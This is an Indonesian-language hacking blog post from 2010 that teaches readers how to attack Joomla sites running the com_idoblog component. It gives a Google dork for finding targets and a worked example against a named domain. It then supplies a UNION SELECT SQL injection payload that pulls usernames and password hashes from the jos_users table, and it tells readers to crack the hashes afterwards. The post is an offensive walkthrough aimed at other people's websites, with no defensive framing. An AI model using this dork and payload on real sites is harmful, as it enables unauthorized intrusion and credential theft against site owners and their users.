exploit joomla

pertama qta buka paman qta bersama :) mang google
nah lalu masukin deh dork nya kya gini
Quote:
inurl:com_idoblog

misal qta dapet target kaya gini
http://xtiara.boengamas.com/index.php?option=com_idoblog&task=viewpost&id=49
dah gtu qta cari deh gambar atw nama orang yg posting tu blog........ klw da gambar biasany waktu pointer mos di set disana da pilihan userblog dengan profile qta klik yg profile.................
tpi untuk contoh yg sya berikan ini sya memilih userblog, karena ketika sya pilih profile component nya berubah menjadi bukan idoblog :)
http://xtiara.boengamas.com/index.php?option=com_idoblog&task=userblog&userid=66&Itemid=
setelah url menjadi seperti itu qta lakukan sedikit modifikasi :D
http://xtiara.boengamas.com/index.php?option=com_idoblog&task=profile&userid=66&Itemid= menjadi seperti ini
lalu qta masukan exploit nya yg sya dapat dari milw0rm

+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--

sehingga url berubah menjadi seperti ini [url]http://xtiara.boengamas.com/index.php?option=com_idoblog&task=profile&userid=66+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
&Itemid=[/url]
jika beruntung maka akan keluar username dan password tinggal cari crack joomla nya

sekian dlu tulisan panjang lebar dari nubie ni somaga dapat membantu


sumber Tecon-crew.org

Anda baru saja membaca artikel yang berkategori dengan judul exploit joomla. Anda bisa bookmark halaman ini dengan URL http://blogku-duniaku.blogspot.com/2010/02/exploit-joomla.html. Terima kasih!

Ditulis oleh: zenonk - Sabtu, 20 Februari 2010